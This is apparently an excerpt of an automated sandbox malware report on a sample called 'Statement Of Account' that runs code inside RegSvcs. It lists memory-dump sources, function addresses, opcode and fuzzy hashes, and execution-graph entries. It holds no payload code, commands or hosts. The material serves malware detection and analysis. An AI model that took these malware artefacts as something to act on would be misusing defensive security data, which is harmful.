                                                                                            • Opcode ID: 75841915d44f9895c68e8c2bb9b6c8af9e6dd095fda68edb52c9678334e90e27
                                                                                            • Instruction ID: 10fc5602140efa79eca7e60a914fa1960731b04ad016774ec505ca2fdadad11e
                                                                                            • Opcode Fuzzy Hash: 75841915d44f9895c68e8c2bb9b6c8af9e6dd095fda68edb52c9678334e90e27
                                                                                            • Instruction Fuzzy Hash: CFE1E7B4E001198FDB14DFA9C5809AEBBF2FF89304F248169E415AB356DB35AD42CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2B0B0 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82fab820c083b62ee36d8b7ad3e19544c0526c2367649238b2469987c68c63e8
                                                                                            • Instruction ID: ecf455ecce51d54c660a192de8c2c416ad83a6b6a6a20553fef46ea20909c93e
                                                                                            • Opcode Fuzzy Hash: 82fab820c083b62ee36d8b7ad3e19544c0526c2367649238b2469987c68c63e8
                                                                                            • Instruction Fuzzy Hash: CBE10AB4E002598FDB14DFA9C5809AEFBB2FF89304F248169E415AB356D735AD42CF60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2BE98 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d1411ee9da73113aa30347d0434f9af5bd032cf418c5fd732e1ed80ac356a70
                                                                                            • Instruction ID: 78013b35e56b31de990277148da4c225793e67b9ef6b0e2d21d24ad446b7f194
                                                                                            • Opcode Fuzzy Hash: 4d1411ee9da73113aa30347d0434f9af5bd032cf418c5fd732e1ed80ac356a70
                                                                                            • Instruction Fuzzy Hash: 86E11CB4E001298FDB14DFA9C5809AEFBB2FF89314F248169E415A7356DB35AD42CF60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A298B0 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4b292af607ee39e5a24d9923335a416f0a2c181203e4a60e11664a32b97c390e
                                                                                            • Instruction ID: 3d1d4dcb7381a3bab2aa55b48d539c4285b182c08806c804728138e940a3c395
                                                                                            • Opcode Fuzzy Hash: 4b292af607ee39e5a24d9923335a416f0a2c181203e4a60e11664a32b97c390e
                                                                                            • Instruction Fuzzy Hash: 0DE1E8B4E002198FDB14DFA9C5809AEFBB2FF89304F248169E415AB356D735AD42CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A20C49 Relevance: .3, Instructions: 266COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c234e0101ed211c13331e06a7d4cc156354c8e39f94d15e9f6430d71706c8d66
                                                                                            • Instruction ID: cf62df223fe3629ea43e627fb6d21aacf558a57facf22045f6909b1dfa1f1178
                                                                                            • Opcode Fuzzy Hash: c234e0101ed211c13331e06a7d4cc156354c8e39f94d15e9f6430d71706c8d66
                                                                                            • Instruction Fuzzy Hash: F7D1D43182075ADACB11EB64D994ADDB7B1FF95300F10879AE10977220EF70AAD9CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014ADCD4 Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8116639c0b139183af72de532e083ae45aed1fc52357cdc9919ca2c2993d9265
                                                                                            • Instruction ID: b21c79b0b268296953715728871c2f974b03ac185077dee8bbef2bf942855cb0
                                                                                            • Opcode Fuzzy Hash: 8116639c0b139183af72de532e083ae45aed1fc52357cdc9919ca2c2993d9265
                                                                                            • Instruction Fuzzy Hash: 81A17332E006058FCF15DFB9D8445DEBBB2FFA4300B56856AE905AB265DB31D946CF80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A20C58 Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e6f119aa1ab5f747fbf1ea55a37f520b7c7840ee8bb24b083281c03359603f0d
                                                                                            • Instruction ID: 31f23eb7e183da55ba1230b4ac1a6999d3539d8913d03b8470e1eae28172627d
                                                                                            • Opcode Fuzzy Hash: e6f119aa1ab5f747fbf1ea55a37f520b7c7840ee8bb24b083281c03359603f0d
                                                                                            • Instruction Fuzzy Hash: D5D1D43182075ADACB11EB64D994ADDB7B1FF95300F10879AE10977220EF70AAD9CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2B09F Relevance: .1, Instructions: 135COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 304e534db5314611e8ca5cdcb71373f5fcc58c4c63970bc1b6fa5b648b30bfed
                                                                                            • Instruction ID: b09021a393203e38bd72b47f16b507eae42b00dc5fdf609d9babca5870069fd1
                                                                                            • Opcode Fuzzy Hash: 304e534db5314611e8ca5cdcb71373f5fcc58c4c63970bc1b6fa5b648b30bfed
                                                                                            • Instruction Fuzzy Hash: D1510CB0E002598FDB14DFA9C5809AEFBF2FF89304F148169D418AB356D7355942CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2B4D8 Relevance: .1, Instructions: 134COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e837a4d527d98b0dcaef5b00e43d4ad18c40b9148ec97cdb4b3c0fca891fb0cf
                                                                                            • Instruction ID: 1fff99361f779a7825e3e6ece63656f06b8dfa578b5f1b198323544925652ba1
                                                                                            • Opcode Fuzzy Hash: e837a4d527d98b0dcaef5b00e43d4ad18c40b9148ec97cdb4b3c0fca891fb0cf
                                                                                            • Instruction Fuzzy Hash: D851FCB0E042198FDB14CFA9C5809AEFBB2FF89304F248169D419AB356D7359E42CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A298A3 Relevance: .1, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d4ffd007aa727a226ccfed864f9d732c483ac10f2e036958acafba4ad1a5e6e5
                                                                                            • Instruction ID: 4009f16e5714dc24f0bdbc88a9c5128a2e5eee0748bad398a5b4858e24c43a28
                                                                                            • Opcode Fuzzy Hash: d4ffd007aa727a226ccfed864f9d732c483ac10f2e036958acafba4ad1a5e6e5
                                                                                            • Instruction Fuzzy Hash: 0451DCB4E002198FDB14DFAAC5809AEBBF2BF89304F248169D418B7356D735A942CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:0%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:40%
                                                                                            Total number of Nodes:5
                                                                                            Total number of Limit Nodes:1
                                                                                            execution_graph 85117 fb2ad0 LdrInitializeThunk 85122 fb2c00 85124 fb2c0a 85122->85124 85125 fb2c1f LdrInitializeThunk 85124->85125 85126 fb2c11 85124->85126

                                                                                            Executed Functions

                                                                                            Function 00FB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 4 fb2ad0-fb2adc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: cc2e2a8ae46621598a9b8d89313e2ffa605b89bdc8ab4146540453c844bd4d62
                                                                                            • Instruction ID: 05424a52798a041cdd81864e3562400e0df599feb2ed4dfb52b032a459549de4
                                                                                            • Opcode Fuzzy Hash: cc2e2a8ae46621598a9b8d89313e2ffa605b89bdc8ab4146540453c844bd4d62
                                                                                            • Instruction Fuzzy Hash: 10900225211401130205B5594705A07004687D5391355C036F1015550DDA2689626121
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 6 fb2bf0-fb2bfc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ab779af482f44ee505acf487c1ef767135a5d2c31de1c9aca1668798a5775784
                                                                                            • Instruction ID: cf37b0310e7a6e786b4d594baf68cadc8904c6143597b9ced00306e5f50e071a
                                                                                            • Opcode Fuzzy Hash: ab779af482f44ee505acf487c1ef767135a5d2c31de1c9aca1668798a5775784
                                                                                            • Instruction Fuzzy Hash: 7890023120140912D28071598505B4A000587D1341F95C02AA0025654ECE1A8B5A77A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 5 fb2b60-fb2b6c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9cf608c65efdaa56300a7c35f23e1fb2cb65d8ea9fe6f8b6b236f5630d0aed6f
                                                                                            • Instruction ID: 47fbe135e8bea4eabfb918b7d945aeb5ab33d0f5f0e01880bd641e1ff638cd88
                                                                                            • Opcode Fuzzy Hash: 9cf608c65efdaa56300a7c35f23e1fb2cb65d8ea9fe6f8b6b236f5630d0aed6f
                                                                                            • Instruction Fuzzy Hash: 9B90026120240113420571598515B16400A87E0341B55C036E1014590EC92A89927125
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 8 fb2ca0-fb2cac LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2b968c0f4a8e8e87676919ad54706fc47c729a3753a8dee66ce1c14d4b017968
                                                                                            • Instruction ID: c0c03be779c94eb1c66f838638771097d8ca142642de68c1fd9f70e60e7df239
                                                                                            • Opcode Fuzzy Hash: 2b968c0f4a8e8e87676919ad54706fc47c729a3753a8dee66ce1c14d4b017968
                                                                                            • Instruction Fuzzy Hash: 2290023120140512D20075999509B46000587E0341F55D026A5024555FCA6A89927131
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 7 fb2c70-fb2c7c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 77a57dddc62965488e89132ef8ce156c341a64f860157b92796d966612a4d28d
                                                                                            • Instruction ID: 478c82dba3950a886dacb26628c784f6d74f3b536b17e01a4bdc7c22baf068b5
                                                                                            • Opcode Fuzzy Hash: 77a57dddc62965488e89132ef8ce156c341a64f860157b92796d966612a4d28d
                                                                                            • Instruction Fuzzy Hash: 3F90023120148912D2107159C505B4A000587D0341F59C426A4424658E8A9A89927121
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 12 fb2df0-fb2dfc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 0e559e56f872fcd1b7d1478be51161b8b36a7ec463f8eb8d4c2437ebf3504c47
                                                                                            • Instruction ID: ba70b703e36e9163feae64d6d06dffea3f1e0448f123e9780496bda7c6cc744a
                                                                                            • Opcode Fuzzy Hash: 0e559e56f872fcd1b7d1478be51161b8b36a7ec463f8eb8d4c2437ebf3504c47
                                                                                            • Instruction Fuzzy Hash: 2390023120140523D21171598605B07000987D0381F95C427A0424558E9A5B8A53B121
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 11 fb2dd0-fb2ddc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5206f19391a2bd638adba218f0ec52cda677e6440fd300c1f0fb8517c5d6c126
                                                                                            • Instruction ID: 68e6baf6fbd8261568102945af2d49f153c040652d4f9f541e5ecbd752ba06b9
                                                                                            • Opcode Fuzzy Hash: 5206f19391a2bd638adba218f0ec52cda677e6440fd300c1f0fb8517c5d6c126
                                                                                            • Instruction Fuzzy Hash: 72900221242442625645B1598505A07400697E0381795C027A1414950D892B9957E621
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 10 fb2d30-fb2d3c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 183e7d045ecf3ec9d0c4a81611e41c5cc7a5657bc5940a720faf2e5e262547a5
                                                                                            • Instruction ID: acf9d1dea48d6a7b2955214d80d7ff68ba5b6ccf7cbc8ccce1e89174028439e1
                                                                                            • Opcode Fuzzy Hash: 183e7d045ecf3ec9d0c4a81611e41c5cc7a5657bc5940a720faf2e5e262547a5
                                                                                            • Instruction Fuzzy Hash: E790022130140113D24071599519B064005D7E1341F55D026E0414554DDD1A89576222
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 9 fb2d10-fb2d1c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 79035a43ba252b2792360a735cf812e9cece500f16032a44e0d19c66693505a9
                                                                                            • Instruction ID: bf571d745d479f4d5e73f70784d6f9765bbd74f5e22537b0e228f1c5af56e96e
                                                                                            • Opcode Fuzzy Hash: 79035a43ba252b2792360a735cf812e9cece500f16032a44e0d19c66693505a9
                                                                                            • Instruction Fuzzy Hash: 7D90022921340112D28071599509B0A000587D1342F95D42AA0015558DCD1A896A6321
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 14 fb2ea0-fb2eac LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 34782eb9c12139f61b58002dc932c9ca853b23e611b0e4ce9da4c46239c933cb
                                                                                            • Instruction ID: e3b98dd1b6e38068f29cdf522f6566c175c08b956858bb1858b5de8da9e1618c
                                                                                            • Opcode Fuzzy Hash: 34782eb9c12139f61b58002dc932c9ca853b23e611b0e4ce9da4c46239c933cb
                                                                                            • Instruction Fuzzy Hash: 5990027120140512D24071598505B46000587D0341F55C026A5064554F8A5E8ED67665
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 13 fb2e80-fb2e8c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
